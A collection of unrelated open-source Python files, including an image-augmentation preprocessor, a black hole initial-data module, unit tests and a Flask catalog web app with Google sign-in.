plt.suptitle(' Envelope - {}'.format(frame))
# emd.plotting.plot_imfs(Ip,t, scale_y=True, cmap=True)
# emd.plotting.plot_imfs(If,t, scale_y=True, cmap=True)
def WSST(df, fs, ridge_ext = False):
t = df.index.to_numpy()
for frame in df.columns:
S = df[frame].to_numpy()
Tw, _, nf, na, *_ = sq.ssq_cwt(S, fs=fs, nv=64, ssq_freqs='linear', maprange='energy')
vizspect(t, nf, np.abs(Tw), 'WSST - '+frame, ylims=[1, 480])
if ridge_ext:
ridge = sq.ridge_extraction.extract_ridges(Tw, bw=4, scales=nf, n_ridges=3)
|
StarcoderdataPython
|
4821269
|
import functools
from typing import Any, Callable, Dict, Optional, Union
def skip_invocation(determinator: Optional[Union[str, bool, Callable[[Dict[str, Any], Any], bool]]] = None) -> Union[Callable, None]:
"""
A decorator which allows to skip decorated function's execution if certain conditions are met.
By default it returns decorated function's execution if no arguments are provided.
If a determinator of type 'str' is provided, the decorator checks whether this key exists function's event 'dict' as parses result as 'bool' type.
If a determinator of type 'bool' is provided, the decorator parses its value.
If a callable object is provided as determinator, the decorator parses its value as 'bool'.
Callable should accept 2 arguments - Lambda function's event and context.
If any of the above evaluate to 'bool' of value True, the decorated function is not executed.
:param determinator: An object which is used to evaluate whether to execute the decorated function.
:return: Decorated function or None.
Examples
========
When no parameter is passed as decorator's determinator.
>>> item = {'heartbeat': True}
>>> context = ''
>>> @skip_invocation()
... def handler(event, context):
... return event
>>> handler(item, context)
{'heartbeat': True}
When a 'bool' of value True is provided (decorated function does not invoke).
>>> item = {'heartbeat': True}
>>> context = ''
>>> @skip_invocation(determinator=True)
... def handler(event, context):
... return event
>>> handler(item, context)
>>>
When a 'str' is provided which exists in event's 'dict' (decorated function does not invoke).
>>> item = {'heartbeat': True}
>>> context = ''
>>> @skip_invocation(determinator="heartbeat")
... def handler(event, context):
... return event
>>> handler(item, context)
>>>
When a callable is provided which evaluates to True.
Callable should take 2 arguments - Lambda function's event and context.
>>> item = {'heartbeat': True}
>>> context = ''
>>> is_heartbeat = lambda e, c: "heartbeat" in e
>>> @skip_invocation(determinator=is_heartbeat)
... def handler(event, context):
... return event
>>> handler(item, context)
>>>
"""
def wrapper(func):
@functools.wraps(func)
def wrapped_f(*args, **kwargs):
skip = False
event: Dict[str, Any] = args[0]
context: Any = args[1]
if isinstance(determinator, str):
skip = bool(event.get(determinator, False))
elif isinstance(determinator, bool):
skip = determinator
elif callable(determinator):
skip = bool(determinator(event, context))
if skip:
return
return func(*args, **kwargs)
return wrapped_f
return wrapper
|
StarcoderdataPython
|
1778212
|
<gh_stars>0
import calendar
import time
for x in range(2000, 2031):
y = calendar.isleap(x)
print(f'YEAR {x} -> LEAP_YEAR = {y}')
for d in calendar.day_name:
print(d)
print('NOW IS', time.ctime())
XLIST = [10, 20, 30, 40]
for x in XLIST:
print(f'x = {x} ...')
time.sleep(5)
|
StarcoderdataPython
|
11375329
|
<gh_stars>10-100
# Author: <NAME> <<EMAIL>>
# Copyright (c) 2021 <NAME>
#
# This file is part of Monet.
from ..visualize.util import DEFAULT_PLOTLY_COLORS, DEFAULT_GGPLOT_COLORS
def get_default_cluster_colors(colorscheme: str = None):
cluster_colors = {}
if colorscheme == 'plotly':
numeric_colors = DEFAULT_PLOTLY_COLORS
name_colors = DEFAULT_PLOTLY_COLORS
elif colorscheme == 'ggplot':
numeric_colors = DEFAULT_GGPLOT_COLORS
name_colors = DEFAULT_GGPLOT_COLORS
else:
numeric_colors = DEFAULT_GGPLOT_COLORS
name_colors = DEFAULT_PLOTLY_COLORS
for i in range(20):
# set default colors for first 20 clusters,
# assuming they are named correctly
# ("Cluster 1", "Cluster 2", ..., or "1", "2", ...)
for i in range(20):
# for 0, 1, ..., we use ggplot colors
cluster_colors[i] = numeric_colors[i]
# Cluster 1, Cluster 2, ..., we use plotly colors
cluster_colors['Cluster %d' % (i+1)] = name_colors[i]
# also set default color for cluster named "Outliers"
cluster_colors['Outliers'] = 'lightgray'
return cluster_colors
|
StarcoderdataPython
|
3447343
|
import numpy as np
from numpy import ndarray
from yacs.config import CfgNode
from albumentations import OneOf, Compose, MotionBlur, MedianBlur, Blur, RandomBrightnessContrast, GaussNoise, \
GridDistortion, Rotate, HorizontalFlip, CoarseDropout, Cutout
from .grid_mask import GridMask
from typing import Union, List, Tuple
from .augmix import augmentations, augment_and_mix
import cv2
from cv2 import resize
import torch
def content_crop(img: ndarray, white_background: bool):
"""
Center the content, removed
https://www.kaggle.com/iafoss/image-preprocessing-128x128
:param img: grapheme image matrix
:param white_background: whether the image
:return: cropped image matrix
"""
# Remove the surrounding 5 pixels
img = img[5:-5, 5:-5]
if white_background:
y_list, x_list = np.where(img < 235)
else:
y_list, x_list = np.where(img > 80)
# get xy min max
xmin, xmax = np.min(x_list), np.max(x_list)
ymin, ymax = np.min(y_list), np.max(y_list)
# Manually set the baseline low and high for x&y
xmin = xmin - 13 if (xmin > 13) else 0
ymin = ymin - 10 if (ymin > 10) else 0
xmax = xmax + 13 if (xmax < 223) else 236
ymax = ymax + 10 if (ymax < 127) else 137
# Reposition the images
img = img[ymin:ymax, xmin:xmax]
return img
def pad_to_square(img: ndarray, white_background: bool):
ly, lx = img.shape
l = max(lx, ly) + 16
if white_background:
constant_pad = 255
else:
constant_pad = 0
img = np.pad(img, [((l - ly) // 2,), ((l - lx) // 2,)], mode='constant', constant_values=constant_pad)
return img
class Preprocessor(object):
"""
bengali data preprocessor
"""
def __init__(self, node_cfg_dataset: CfgNode):
"""
Constructor of the Preprocessing from the Configuration Node properties.
:param node_cfg_dataset: dataset config
"""
# Augmentation node is the
aug_cfg = node_cfg_dataset.AUGMENTATION
# !!!Training ONLY!!!
# Color augmentation settings,
self.color_aug = self.generate_color_augmentation(aug_cfg)
# Shape augmentation settings
self.shape_aug = self.generate_shape_augmentation(aug_cfg)
# Cutout augmentation settings
self.cutout_aug = self.generate_cutout_augmentation(aug_cfg)
self.pad = node_cfg_dataset.PAD_TO_SQUARE
self.white_background = node_cfg_dataset.WHITE_BACKGROUND
self.do_augmix = node_cfg_dataset.DO_AUGMIX
# !!!~~~BOTH~~~!!!
# Color augmentation settings,
self.resize_shape = node_cfg_dataset.RESIZE_SHAPE
# Crop augmentation settings,
self.crop = node_cfg_dataset.CONCENTRATE_CROP
# Convert to RGB
self.to_rgb = node_cfg_dataset.TO_RGB
# Normalize Mean or STD?
self.normalize_mean = node_cfg_dataset.get('NORMALIZE_MEAN')
self.normalize_std = node_cfg_dataset.get('NORMALIZE_STD')
if self.do_augmix:
augmentations.IMAGE_SIZE = node_cfg_dataset.RESIZE_SHAPE[0]
if not self.to_rgb:
self.normalize_mean = np.mean(self.normalize_mean)
self.normalize_std = np.mean(self.normalize_std)
if not self.to_rgb:
self.normalize_mean = np.mean(self.normalize_mean)
self.normalize_std = np.mean(self.normalize_std)
@staticmethod
def generate_color_augmentation(aug_cfg: CfgNode) -> Union[Compose, None]:
"""
generate color augmentation object
:param aug_cfg: augmentation config
:return color_aug: color augmentation object
"""
color_aug_list = []
if aug_cfg.BRIGHTNESS_CONTRAST_PROB > 0:
color_aug_list.append(RandomBrightnessContrast(p=aug_cfg.BRIGHTNESS_CONTRAST_PROB))
if aug_cfg.BLURRING_PROB > 0:
blurring = OneOf([
MotionBlur(aug_cfg.BLUR_LIMIT, p=1),
MedianBlur(aug_cfg.BLUR_LIMIT, p=1),
Blur(aug_cfg.BLUR_LIMIT, p=1),
], p=aug_cfg.BLURRING_PROB)
color_aug_list.append(blurring)
if aug_cfg.GAUSS_NOISE_PROB > 0:
color_aug_list.append(GaussNoise(p=aug_cfg.GAUSS_NOISE_PROB))
if aug_cfg.GRID_MASK_PROB > 0:
color_aug_list.append(GridMask(num_grid=(3, 7), p=aug_cfg.GRID_MASK_PROB))
if len(color_aug_list) > 0:
color_aug = Compose(color_aug_list, p=1)
return color_aug
else:
return None
@staticmethod
def generate_shape_augmentation(aug_cfg: CfgNode) -> Union[Compose, None]:
"""
generate shape augmentations
:param aug_cfg: augmentation config
:return shape_aug: shape augmentation object
"""
shape_aug_list = []
if aug_cfg.ROTATION_PROB > 0:
shape_aug_list.append(
Rotate(limit=aug_cfg.ROTATION_DEGREE, border_mode=1, p=aug_cfg.ROTATION_PROB)
)
if aug_cfg.GRID_DISTORTION_PROB > 0:
shape_aug_list.append(GridDistortion(p=aug_cfg.GRID_DISTORTION_PROB))
if aug_cfg.HORIZONTAL_FLIP_PROB > 0:
shape_aug_list.append(HorizontalFlip(p=aug_cfg.HORIZONTAL_FLIP_PROB ))
if len(shape_aug_list) > 0:
shape_aug = Compose(shape_aug_list, p=1)
return shape_aug
else:
return None
@staticmethod
def generate_cutout_augmentation(aug_cfg: CfgNode):
cutout_aug_list = []
if aug_cfg.CUTOUT_PROB > 0:
cutout_aug_list.append(Cutout(num_holes=1, max_h_size=aug_cfg.HEIGHT//2, max_w_size=aug_cfg.WIDTH//2,
fill_value=255, p=aug_cfg.CUTOUT_PROB))
if len(cutout_aug_list) > 0:
cutout_aug = Compose(cutout_aug_list, p=1)
return cutout_aug
else:
return None
def __call__(self, img: ndarray, is_training: bool, normalize: bool = True) -> Union[ndarray, Tuple]:
"""
Conduct the transformation
:param img: input img array
:param is_training: whether it's training (to do augmentation)
:return : transformed data
"""
x = img
# if not white background, reverse
if not self.white_background:
x = 255 - x
# crop
if self.crop:
x = content_crop(x, self.white_background)
if self.pad:
x = pad_to_square(x, self.white_background)
# resize
x = resize(x, self.resize_shape)
# to RGB
if self.to_rgb:
x = np.repeat(np.expand_dims(x, axis=-1), 3, axis=-1)
else:
x = np.expand_dims(x, axis=-1)
# shape augment
if is_training:
if self.do_augmix:
return self.compute_augmix_inputs(img)
else:
# normal shape color changes
if self.shape_aug is not None:
x = self.shape_aug(image=x)['image']
if self.color_aug is not None:
x = self.color_aug(image=x)['image']
# shape augment
if is_training and self.shape_aug is not None:
x = self.shape_aug(image=x)['image']
# color & cutout augment
if is_training and self.color_aug is not None:
x = self.color_aug(image=x)['image']
x = self.cutout_aug(image=x)['image']
if not normalize:
return x
x = self.normalize_img(x)
return x
x = self.normalize_img(x)
# Resume the permutation
img = torch.tensor(x)
img = img.permute([2, 0, 1])
return img
def normalize_img(self, x: ndarray) -> ndarray:
"""
Normalize image to a specific mean/std if they are specifiied, otherwise, default to /255
:param x:
:return:
"""
# normalize to 0-1
x = x / 255.
if self.normalize_mean is not None:
x = (x - self.normalize_mean) / self.normalize_std
return x
def compute_augmix_inputs(self, img):
aug1 = augment_and_mix(img)
aug1 = self.normalize_img(aug1)
aug2 = augment_and_mix(img)
aug2 = self.normalize_img(aug2)
img = self.normalize_img(img)
return img, aug1, aug2
|
StarcoderdataPython
|
3357869
|
<filename>BSSN/UIUCBlackHole.py
# This module sets up UIUC Black Hole initial data in terms of
# the variables used in BSSN_RHSs.py
# Authors: <NAME>, zachetie **at** gmail **dot** com
# <NAME>, terrencepierrej **at** gmail **dot** com
# <NAME>
# ## This module sets up initial data for a merging black hole system in spherical coordinates. We can convert from spherical to any coordinate system defined in [reference_metric.py](../edit/reference_metric.py) (e.g., SinhSpherical, Cylindrical, Cartesian, etc.) using the [Exact ADM Spherical-to-BSSNCurvilinear converter module](Tutorial-ADM_Initial_Data-Converting_Exact_ADM_Spherical_or_Cartesian_to_BSSNCurvilinear.ipynb)
#
# ### Here we set up UIUC Black Hole initial data ([Liu, Etienne, & Shapiro, PRD 80 121503, 2009](https://arxiv.org/abs/1001.4077)):
#
# UIUC black holes have the advantage of finite coordinate radius in the maximal spin limit. It is therefore excellent for studying very highly spinning black holes. This module sets the UIUC black hole at the origin.
#
# **Inputs for initial data**:
#
# * The black hole mass $M$.
# * The dimensionless spin parameter $\chi = a/M$
#
# **Additional variables needed for spacetime evolution**:
#
# * Desired coordinate system
# * Desired initial lapse $\alpha$ and shift $\beta^i$. We will choose our gauge conditions as $\alpha=1$ and $\beta^i=B^i=0$. $\alpha = \psi^{-2}$ will yield much better behavior, but the conformal factor $\psi$ depends on the desired *destination* coordinate system (which may not be spherical coordinates).
# Step P0: Load needed modules
import sympy as sp # SymPy: The Python computer algebra package upon which NRPy+ depends
import NRPy_param_funcs as par # NRPy+: Parameter interface
import indexedexp as ixp # NRPy+: Symbolic indexed expression (e.g., tensors, vectors, etc.) support
import sys # Standard Python module for multiplatform OS-level functions
from pickling import pickle_NRPy_env # NRPy+: Pickle/unpickle NRPy+ environment, for parallel codegen
import BSSN.ADM_Exact_Spherical_or_Cartesian_to_BSSNCurvilinear as AtoB
thismodule = __name__
# The UIUC initial data represent a Kerr black hole with mass M
# and dimensionless spin chi in UIUC quasi-isotropic coordinates,
# see https://arxiv.org/abs/1001.4077
# Input parameters:
M, chi = par.Cparameters("REAL", thismodule, ["M", "chi"], [1.0, 0.99])
# ComputeADMGlobalsOnly == True will only set up the ADM global quantities.
# == False will perform the full ADM SphorCart->BSSN Curvi conversion
def UIUCBlackHole(ComputeADMGlobalsOnly = False, include_NRPy_basic_defines_and_pickle=False):
global Sph_r_th_ph,r,th,ph, gammaSphDD, KSphDD, alphaSph, betaSphU, BSphU
# All gridfunctions will be written in terms of spherical coordinates (r, th, ph):
r,th,ph = sp.symbols('r th ph', real=True)
# Step 0: Set spatial dimension (must be 3 for BSSN)
DIM = 3
par.set_parval_from_str("grid::DIM",DIM)
# Step 1: Set psi, the conformal factor:
# Spin per unit mass
a = M*chi
# Defined under equation 1 in Liu, Etienne, & Shapiro (2009) https://arxiv.org/pdf/1001.4077.pdf
# Boyer - Lindquist outer horizon
rp = M + sp.sqrt(M**2 - a**2)
# Boyer - Lindquist inner horizon
rm = M - sp.sqrt(M**2 - a**2)
# Boyer - Lindquist radius in terms of UIUC radius
# Eq. 11
# r_{BL} = r * ( 1 + r_+ / 4r )^2
rBL = r*(1 + rp / (4*r))**2
# Expressions found below Eq. 2
# Sigma = r_{BL}^2 + a^2 cos^2 theta
SIG = rBL**2 + a**2*sp.cos(th)**2
# Delta = r_{BL}^2 - 2Mr_{BL} + a^2
DEL = rBL**2 - 2*M*rBL + a**2
# A = (r_{BL}^2 + a^2)^2 - Delta a^2 sin^2 theta
AA = (rBL**2 + a**2)**2 - DEL*a**2*sp.sin(th)**2
# *** The ADM 3-metric in spherical basis ***
gammaSphDD = ixp.zerorank2()
# Declare the nonzero components of the 3-metric
# (Eq. 13 of Liu, Etienne, & Shapiro, https://arxiv.org/pdf/1001.4077.pdf):
# ds^2 = Sigma (r + r_+/4)^2 / ( r^3 (r_{BL} - r_- ) * dr^2 +
# Sigma d theta^2 + (A sin^2 theta) / Sigma * d\phi^2
gammaSphDD[0][0] = ((SIG*(r + rp/4)**2)/(r**3*(rBL - rm)))
gammaSphDD[1][1] = SIG
gammaSphDD[2][2] = AA/SIG*sp.sin(th)**2
# *** The physical trace-free extrinsic curvature in spherical basis ***
# Nonzero components of the extrinsic curvature K, given by
# Eq. 14 of Liu, Etienne, & Shapiro, https://arxiv.org/pdf/1001.4077.pdf:
KSphDD = ixp.zerorank2()
# K_{r phi} = K_{phi r} = (Ma sin^2 theta) / (Sigma sqrt{A Sigma}) *
# [3r^4_{BL} + 2a^2 r^2_{BL} - a^4 - a^2 (r^2_{BL} - a^2) sin^2 theta] *
# (1 + r_+ / 4r) (1 / sqrt{r(r_{BL} - r_-)})
KSphDD[0][2] = KSphDD[2][0] = (M*a*sp.sin(th)**2)/(SIG*sp.sqrt(AA*SIG))*\
(3*rBL**4 + 2*a**2*rBL**2 - a**4- a**2*(rBL**2 - a**2)*\
sp.sin(th)**2)*(1 + rp/(4*r))*1/sp.sqrt(r*(rBL - rm))
# Components of the extrinsic curvature K, given by
# Eq. 15 of Liu, Etienne, & Shapiro, https://arxiv.org/pdf/1001.4077.pdf:
# K_{theta phi} = K_{phi theta} = -(2a^3 Mr_{BL} cos theta sin^3 theta) /
# (Sigma sqrt{A Sigma}) x (r - r_+ / 4) sqrt{(r_{BL} - r_-) / r }
KSphDD[1][2] = KSphDD[2][1] = -((2*a**3*M*rBL*sp.cos(th)*sp.sin(th)**3)/ \
(SIG*sp.sqrt(AA*SIG)))*(r - rp/4)*sp.sqrt((rBL - rm)/r)
alphaSph = sp.sympify(1) # We generally choose alpha = 1/psi**2 (psi = BSSN conformal factor) for these initial data
betaSphU = ixp.zerorank1() # We generally choose \beta^i = 0 for these initial data
BSphU = ixp.zerorank1() # We generally choose B^i = 0 for these initial data
if ComputeADMGlobalsOnly:
return
# Validated against original SENR: KSphDD[0][2], KSphDD[1][2], gammaSphDD[2][2], gammaSphDD[0][0], gammaSphDD[1][1]
#print(sp.mathematica_code(gammaSphDD[1][1]))
Sph_r_th_ph = [r,th,ph]
cf,hDD,lambdaU,aDD,trK,alpha,vetU,betU = \
AtoB.Convert_Spherical_or_Cartesian_ADM_to_BSSN_curvilinear("Spherical", Sph_r_th_ph,
gammaSphDD,KSphDD,alphaSph,betaSphU,BSphU)
# Let's choose alpha = 1/psi**2 (psi = BSSN conformal factor) for these initial data,
# where psi = exp(phi); chi = 1/psi**4; W = 1/psi**2
if par.parval_from_str("EvolvedConformalFactor_cf") == "phi":
alpha = sp.exp(-2*cf)
elif par.parval_from_str("EvolvedConformalFactor_cf") == "chi":
alpha = sp.sqrt(cf)
elif par.parval_from_str("EvolvedConformalFactor_cf") == "W":
alpha = cf
else:
print("Error EvolvedConformalFactor_cf type = \""+par.parval_from_str("EvolvedConformalFactor_cf")+"\" unknown.")
sys.exit(1)
import BSSN.BSSN_ID_function_string as bIDf
# Generates initial_data() C function & stores to outC_function_dict["initial_data"]
bIDf.BSSN_ID_function_string(cf, hDD, lambdaU, aDD, trK, alpha, vetU, betU,
include_NRPy_basic_defines=include_NRPy_basic_defines_and_pickle)
if include_NRPy_basic_defines_and_pickle:
return pickle_NRPy_env()
|
StarcoderdataPython
|
324655
|
# Copyright 2021 The Kubeflow Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for kfp.v2.google.client._cloud_function_create_pipeline_job."""
import datetime
import json
import os
import unittest
from kfp.v2.google.client import _cloud_function_templated_http_request
class CloudFunctionCreatePipelineJobTest(unittest.TestCase):
def test_preprocess(self):
test_data_path = os.path.join(
os.path.dirname(__file__),
'testdata',
)
function_request_path = os.path.join(
test_data_path,
'pipeline1_request_body.json',
)
expected_pipeline_request_path = os.path.join(
test_data_path,
'pipeline1_request_body_final.json',
)
with open(function_request_path, 'rb') as f:
function_request = f.read()
with open(expected_pipeline_request_path, 'r') as f:
expected_pipeline_request = json.load(f)
(_, _, resolved_request_body
) = _cloud_function_templated_http_request._preprocess_request_body(
function_request, time=datetime.datetime(2020, 8, 1, 12, 34))
actual_pipeline_request = json.loads(resolved_request_body)
self.assertEqual(actual_pipeline_request, expected_pipeline_request)
if __name__ == '__main__':
unittest.main()
|
StarcoderdataPython
|
397448
|
# Copyright (C) 2009 Canonical Ltd
# Licenced under the txaws licence available at /LICENSE in the txaws source.
from twisted.trial.unittest import TestCase
from txaws.ec2 import model
class SecurityGroupTestCase(TestCase):
def test_creation_defaults(self):
group = model.SecurityGroup("sg-a3f2", "name", "desc")
self.assertEquals(group.id, "sg-a3f2")
self.assertEquals(group.name, "name")
self.assertEquals(group.description, "desc")
self.assertEquals(group.owner_id, "")
self.assertEquals(group.allowed_groups, [])
self.assertEquals(group.allowed_ips, [])
def test_creation_all_parameters(self):
user = "somegal24"
other_groups = [
model.SecurityGroup("sg-other1", "other1", "another group 1"),
model.SecurityGroup("sg-other2", "other2", "another group 2")]
user_group_pairs = [
model.UserIDGroupPair(user, other_groups[0].name),
model.UserIDGroupPair(user, other_groups[1].name)]
ips = [model.IPPermission("tcp", "80", "80", "10.0.1.0/24")]
group = model.SecurityGroup(
"id", "name", "desc", owner_id="me", groups=user_group_pairs, ips=ips)
self.assertEquals(group.id, "id")
self.assertEquals(group.name, "name")
self.assertEquals(group.description, "desc")
self.assertEquals(group.owner_id, "me")
self.assertEquals(group.allowed_groups[0].user_id, "somegal24")
self.assertEquals(group.allowed_groups[0].group_name, "other1")
self.assertEquals(group.allowed_groups[1].user_id, "somegal24")
self.assertEquals(group.allowed_groups[1].group_name, "other2")
self.assertEquals(group.allowed_ips[0].cidr_ip, "10.0.1.0/24")
class UserIDGroupPairTestCase(TestCase):
def test_creation(self):
user_id = "cowboy22"
group_name = "Rough Riders"
user_group_pair = model.UserIDGroupPair(user_id, group_name)
self.assertEquals(user_group_pair.user_id, "cowboy22")
self.assertEquals(user_group_pair.group_name, "Rough Riders")
|
StarcoderdataPython
|
1844356
|
<filename>api.py
"""
This is the main Flask application for Danslist.
All endpoints were built using Flask for routing functionality,
Jinja2 for templating, and SQLAlchemy for database interaction.
"""
# Imports
from functools import wraps
from flask import (Flask, render_template, redirect, url_for,
request, jsonify, flash, make_response)
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.exc import SQLAlchemyError
import bleach
from flask import session as login_session
import random
import string
from oauth2client.client import (flow_from_clientsecrets,
FlowExchangeError)
import httplib2
import json
import requests
from setup import Base, User, Category, Item
from queryhelpers import (getCategories, getCategory,
getItems, getCategoryItems,
getItem)
# Copy your Google oauth2 credentials to client_secrets.json
CLIENT_ID = json.loads(
open('client_secrets.json', 'r').read())['web']['client_id']
APPLICATION_NAME = "Danslist"
app = Flask(__name__)
# From root directory of this application,
# run python db/setup.py to create database.
engine = create_engine('sqlite:///catalog.db', pool_pre_ping=True)
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
# Initializing DBSession() at beginning of each function to avoid Flask error.
def loginRequired(f):
"""
Checks to see if user_id is currently in login_session.
Wraps this check in a decorator.
:return:
decorator function if condition met.
Redirect if not.
"""
@wraps(f)
def decorated_function(*args, **kwargs):
if 'user_id' in login_session:
return f(*args, **kwargs)
else:
flash("You must login first.")
return redirect(url_for('showLogin'))
return decorated_function
def adminRequired(f):
"""
Checks to see if is_admin flag is set to true in login_session.
Wraps this check in a decorator.
:return:
Decorator function if condition met.
Redirect if not.
"""
@wraps(f)
def decorated_function(*args, **kwargs):
if 'is_admin' in login_session and login_session['is_admin']:
return f(*args, **kwargs)
else:
flash("You don't have access to that.")
return redirect(url_for('Catalog'))
return decorated_function
@app.route('/')
@app.route('/catalog')
def Catalog():
"""
Retrieves all items from newest to oldest.
Retrieves all categories.
Returns Home page.
"""
session = DBSession()
categories = getCategories(session)
items = getItems(session)
username = (login_session['username']
if 'username' in login_session.keys()
else None)
return render_template('catalog.html', categories=categories,
username=username, items=items)
@app.route('/catalog/JSON')
def CatalogJSON():
"""
Retrieve all categories and their associated items.
:return:
JSON-formatted list of categories with each
category containing a list of items.
"""
session = DBSession()
categories = getCategories(session)
return jsonify(categories=[r.serialize_items for r in categories])
@app.route('/catalog/items/JSON')
def CatalogItemsJSON():
"""
Retrieve all items in alphabetic order.
:return:
JSON-formatted list of items.
"""
session = DBSession()
items = getItems(session)
return jsonify(items=[r.serialize for r in items])
@app.route('/catalog/<string:category_name>/items')
def CategoryItems(category_name):
"""
View the items for a particular category.
:param category_name: string
:return:
HTML page of a particular category's items.
"""
session = DBSession()
category = getCategory(category_name, session)
categories = getCategories(session)
items = getCategoryItems(category.id, session)
username = (login_session['username']
if 'username' in login_session.keys()
else None)
return render_template('catalog.html',
items=items,
categories=categories,
username=username,
category=category)
@app.route('/catalog/<string:category_name>/items/JSON')
def CategoryItemsJSON(category_name):
"""
View the items for a particular category in JSON
:param category_name: string
:return:
JSON-formatted category and its items.
"""
session = DBSession()
category = (session.query(Category)
.filter(Item.category_id == Category.id)
.filter_by(name=bleach.clean(category_name))
.one())
return jsonify(category=category.serialize_items)
# Admin access only.
@app.route('/categories')
def Categories():
"""
View all categories and potentional actions for them.
:return:
HTML page of categories.
"""
session = DBSession()
categories = session.query(Category).all()
return render_template('categories.html', categories=categories)
@app.route('/categories/JSON')
def CategoriesJSON():
"""
View all categories in JSON
:return:
JSON-formatted list of categories.
"""
session = DBSession()
categories = getCategories(session)
return jsonify(categories=[r.serialize for r in categories])
@app.route('/categories/new', methods=['GET', 'POST'])
@adminRequired
def newCategory():
"""
Create a new category.
:return:
HTML page or redirect
"""
session = DBSession()
if request.method == 'GET':
return render_template('newcategory.html')
if request.method == 'POST':
new_category = Category(
name=bleach.clean(request.form['name'])
)
session.add(new_category)
session.commit()
flash(new_category.label + " created.")
return redirect(url_for('Categories'))
@app.route('/categories/<string:category_name>/edit', methods=['GET', 'POST'])
@adminRequired
def editCategory(category_name):
"""
Edit an existing category.
:param category_name: (string)
:return:
HTML page or redirect
"""
if 'is_admin' not in login_session or not login_session['is_admin']:
flash("You don't have access to that.")
return redirect(url_for('Catalog'))
session = DBSession()
category = getCategory(category_name, session)
if request.method == 'GET':
return render_template('editcategory.html', category=category)
if request.method == 'POST':
category.label = bleach.clean(request.form['name'])
category.name = category.label.lower()
session.add(category)
session.commit()
flash(category.label + " updated.")
return redirect(url_for('Categories'))
@app.route('/categories/<string:category_name>/delete',
methods=['GET', 'POST'])
@adminRequired
def deleteCategory(category_name):
"""
Delete an existing category.
:param category_name: (string)
:return:
Redirect
"""
if 'is_admin' not in login_session or not login_session['is_admin']:
flash("You don't have access to that.")
return redirect(url_for('Catalog'))
session = DBSession()
category = getCategory(category_name, session)
if request.method == 'GET':
return render_template('deletecategory.html', category=category)
if request.method == 'POST':
session.delete(category)
session.commit()
flash(category.label + " deleted.")
return redirect(url_for('Categories'))
@app.route('/catalog/items/new', methods=['GET', 'POST'])
@app.route('/catalog/<string:category_name>/items/new',
methods=['GET', 'POST'])
@loginRequired
def newItem(category_name=None):
"""
Create a new item for category.
:param category_name: (string)
:return:
HTML page
"""
session = DBSession()
categories = getCategories(session)
category = None
if category_name:
category = getCategory(category_name, session)
if request.method == 'GET':
return render_template('newitem.html',
category=category, categories=categories)
if request.method == 'POST':
new_item = Item(
label=bleach.clean(request.form['name']),
description=bleach.clean(request.form['description']),
category_id=bleach.clean(request.form['category']),
user_id=login_session['user_id']
)
new_item = addItem(new_item, session)
flash(new_item.label + " created.")
if category:
return redirect(url_for('CategoryItems',
category_name=category.name))
return redirect(url_for('Catalog'))
def addItem(new_item, session):
"""
Add item to database.
:param new_item: (dictionary) new_item dictionary of all item variables.
:param session: (DBSession) the current session created by DBSession()
:return:
new_item dictionary after post-processing.
"""
new_item.name = new_item.label.lower()
if len(new_item.name) < 1:
raise ValueError('Name cannot be empty.')
session.add(new_item)
session.commit()
return new_item
@app.route('/catalog/<string:category_name>/item/<string:item_name>')
def viewItem(category_name, item_name):
"""
View a particular item from a category.
:param category_name: (string)
:param item_name: (string)
:return:
HTML page
"""
session = DBSession()
category = getCategory(category_name, session)
item = getItem(category.id, item_name, session)
username = None
user_id = None
if 'username' in login_session:
username = login_session['username']
user_id = login_session['user_id']
return render_template('viewitem.html',
item=item, category=category,
username=username, user_id=user_id)
@app.route('/catalog/<string:category_name>/item/<string:item_name>/JSON')
def viewItemJSON(category_name, item_name):
"""
View a particular item from a category in JSON
:param category_name: (string)
:param item_name: (string)
:return:
JSON-formatted http response
"""
session = DBSession()
category = getCategory(category_name, session)
item = getItem(category.id, item_name, session)
return jsonify(item=item.serialize)
@app.route('/catalog/<string:category_name>/item/<string:item_name>/edit',
methods=['GET', 'POST'])
@loginRequired
def editItem(category_name, item_name):
"""
Edit an existing item.
:param category_name: (string)
:param item_name: (string)
:return:
HTML page or redirect
"""
if 'user_id' not in login_session:
return redirect(url_for('showLogin'))
session = DBSession()
category = getCategory(category_name, session)
item = getItem(category.id, item_name, session)
if login_session['user_id'] != item.user_id:
return "You don't have access to this item."
categories = session.query(Category).order_by(Category.name).all()
if request.method == 'GET':
return render_template('edititem.html', category=category,
categories=categories, item=item)
if request.method == 'POST':
item.label = bleach.clean(request.form['name'])
item.description = bleach.clean(request.form['description'])
item.category_id = bleach.clean(request.form['category'])
item = addItem(item, session)
flash(item.label + " updated.")
return redirect(url_for('CategoryItems', category_name=category.name))
@app.route('/catalog/<string:category_name>/item/<string:item_name>/delete',
methods=['GET', 'POST'])
@loginRequired
def deleteItem(category_name, item_name):
"""
Delete an existing item
:param category_name: (string)
:param item_name: (string)
:return:
HTML page or redirect
"""
session = DBSession()
category = getCategory(category_name, session)
item = getItem(category.id, item_name, session)
if login_session['user_id'] != item.user_id:
return "You don't have access to this item."
if request.method == 'GET':
return render_template('deleteitem.html',
category=category, item=item)
if request.method == 'POST':
session.delete(item)
session.commit()
flash(item.label + " deleted.")
return redirect(url_for('CategoryItems',
ategory_name=category.name))
@app.route('/login')
def showLogin():
"""
Generate an state token and display the login page.
"""
# Create anti-forgery state token
state = ''.join(random.choice(string.ascii_uppercase + string.digits)
for x in xrange(32))
login_session['state'] = state
return render_template('login.html', STATE=state)
@app.route('/gconnect', methods=['POST'])
def gconnect():
"""
Using Google's OAUTH2 service, validate and initiate a session.
The session data is saved in Flask session.
:return:
"Done!"
"""
# Validate state token
if request.args.get('state') != login_session['state']:
response = make_response(json.dumps('Invalid state parameter.'), 401)
response.headers['Content-Type'] = 'application/json'
return response
# Obtain authorization code
code = request.data
try:
# Upgrade the authorization code into a credentials object
oauth_flow = flow_from_clientsecrets('client_secrets.json', scope='')
oauth_flow.redirect_uri = 'postmessage'
credentials = oauth_flow.step2_exchange(code)
except FlowExchangeError:
response = make_response(
json.dumps('Failed to upgrade the authorization code.'), 401)
response.headers['Content-Type'] = 'application/json'
return response
